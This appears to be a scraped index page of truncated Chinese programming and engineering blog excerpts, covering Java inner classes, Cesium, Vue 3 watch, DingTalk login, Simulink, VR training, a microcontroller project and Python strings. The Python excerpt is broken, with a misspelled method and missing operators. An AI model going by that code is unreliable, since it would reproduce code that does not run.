Java学习笔记11——内部类的继承与覆盖及总结

1、内部类的继承&#xff1a; 由于创建内部类对象的时候需要外部类的对象&#xff0c;所以在继承内部类的时候情况会比较复杂&#xff0c;需要确保内部类对象与外部类对象之间的引用正确建立&#xff0c;为了解决这个问题&#xff0c;Java提供了一种特殊的语法&#xff0c;来说…

Cesium 自定义Primitive - 圆

一、创作思路 1、创建一个自定义CustomPrimitive 2、然后根据两个点&#xff0c;生成圆 3、方便后期绘制圆 二、实现代码 1、在vue的包中加入turf. npm install turf/turf 1、创建一个CustomCirclePrimitive类,并加入更新的代码 export default class CustomCirclePrimitive …

vue3 对于watch的再次理解 给响应式变量赋相同值时watch不会被触发。

问题 当我给响应式变量赋相同值时watch不会被触发。 之前一直对于watch的理解是会被频繁触发&#xff0c;值变化就会被执行&#xff0c;反之computed会缓存相同值。 看官方文档也没有相关说明&#xff0c;加上赋相同值的场景占少数 结论 在 Vue 3 中&#xff0c;watch 函数默…

钉钉登录前端处理

可参考官网&#xff1a;扫码登录第三方网站 - 钉钉开放平台 方式一&#xff1a;网站将钉钉登录二维码内嵌到自己页面中 <script src"https://g.alicdn.com/dingding/dinglogin/0.0.5/ddLogin.js"></script> 在需要使用钉钉登录的地方实例以下JS对象 …

【Simulink系列】——控制系统仿真基础

声明&#xff1a;本系列博客参考有关专业书籍&#xff0c;截图均为自己实操&#xff0c;仅供交流学习&#xff01; 一、控制系统基本概念 这里就不再介绍类似于开环系统、闭环系统等基本概念了&#xff01; 1、数学模型 控制系统的数学模型是指动态数学模型&#xff0c;大致…

车辆伤害VR安全教育培训复用性强

VR工地伤害虚拟体验是一种新兴的培训方式&#xff0c;它利用虚拟现实技术为参与者提供身临其境的体验。与传统的培训方式相比&#xff0c;VR工地伤害虚拟体验具有许多优势。 首先&#xff0c;VR工地伤害虚拟体验能够模拟真实的工作环境和事故场景&#xff0c;让参与者在安全的环…

基于单片机的晾衣架控制系统设计

目 录 摘 要 I Abstract II 引 言 1 1 系统方案设计 3 1.1 系统方案论证 3 1.2 系统工作原理 4 2 硬件设计 5 2.1 单片机 5 2.2 按键设计 7 2.3 光线检测模块 8 2.4 雨滴检测模块 9 2.5 电压比较器 10 2.6 微动步进电动机 11 2.7 硬件电路原理图 12 3 系统主要软件设计 14 3.1…

Python常用语法汇总(一):字符串、列表、字典操作

1. 字符串处理 print(message.title()) #首字母大写print(message.uper()) #全部大写print(message.lower()) #全部小写full_name "lin" "hai" #合并字符串print("Hello, " full_name.title() "!")print("John Q. %s10s&qu…